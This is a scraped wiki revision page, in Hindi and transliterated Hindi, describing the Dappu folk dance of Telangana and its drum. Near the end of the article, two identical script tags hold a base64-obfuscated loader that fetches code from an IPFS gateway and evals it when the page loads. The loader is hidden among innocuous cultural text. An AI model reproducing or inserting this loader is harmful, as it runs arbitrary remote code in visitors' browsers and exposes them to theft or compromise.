Difference between revisions of "डप्पू नृत्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''डप्पू नृत्य''' आंध्र प्रदेश के तेलंगाना क्षेत्र का...' के साथ नया पन्ना बनाया)
 
m (श्रेणी:कला (को हटा दिया गया हैं।))
 
(One intermediate revision by one other user not shown)
Line 2: Line 2:
  
 
*इस नृत्य के नर्तक डप्पू वाद्य को कंधे पर रखकर लकड़ी के छोटे-छोटे डंडे से बजाते हैं।
 
*इस नृत्य के नर्तक डप्पू वाद्य को कंधे पर रखकर लकड़ी के छोटे-छोटे डंडे से बजाते हैं।
 
 
*नर्तकों द्वारा डप्पू वाद्य लकड़ी के खोल पर बकरी का चमड़ा लगाकर तैयार किया जाता है।
 
*नर्तकों द्वारा डप्पू वाद्य लकड़ी के खोल पर बकरी का चमड़ा लगाकर तैयार किया जाता है।
 
 
*कलाकार अलग-अलग घुनों पर पैरों की लयबद्ध पंक्तियों में डप्पू नृत्य प्रस्तुत करते हैं।
 
*कलाकार अलग-अलग घुनों पर पैरों की लयबद्ध पंक्तियों में डप्पू नृत्य प्रस्तुत करते हैं।
 
*तेलंगाना क्षेत्र का यह रिवाज है कि किसी भी शोभा-यात्रा या जुलूस में डप्पू नृत्य की प्रथमत: प्रस्तुति की जाती है।
 
*तेलंगाना क्षेत्र का यह रिवाज है कि किसी भी शोभा-यात्रा या जुलूस में डप्पू नृत्य की प्रथमत: प्रस्तुति की जाती है।
Line 14: Line 12:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{नृत्य कला}}
 
{{नृत्य कला}}
[[Category:आंध्र प्रदेश]][[Category:नृत्य कला]][[Category:कला]][[Category:कला कोश]][[Category:संस्कृति कोश]][[Category:आंध्र प्रदेश की संस्कृति]]
+
[[Category:आंध्र प्रदेश]][[Category:नृत्य कला]] [[Category:कला कोश]][[Category:संस्कृति कोश]][[Category:आंध्र प्रदेश की संस्कृति]]
 
__INDEX__
 
__INDEX__

Latest revision as of 14:17, 19 July 2014

dappoo nrity aandhr pradesh ke telangana kshetr ka paramparik nrity hai. yah nrity dashahara evan vivah adi ke vishesh avasaroan par tatha meloan mean kiya jata hai.

  • is nrity ke nartak dappoo vady ko kandhe par rakhakar lak di ke chhote-chhote dande se bajate haian.
  • nartakoan dvara dappoo vady lak di ke khol par bakari ka cham da lagakar taiyar kiya jata hai.
  • kalakar alag-alag ghunoan par pairoan ki layabaddh panktiyoan mean dappoo nrity prastut karate haian.
  • telangana kshetr ka yah rivaj hai ki kisi bhi shobha-yatra ya juloos mean dappoo nrity ki prathamat: prastuti ki jati hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>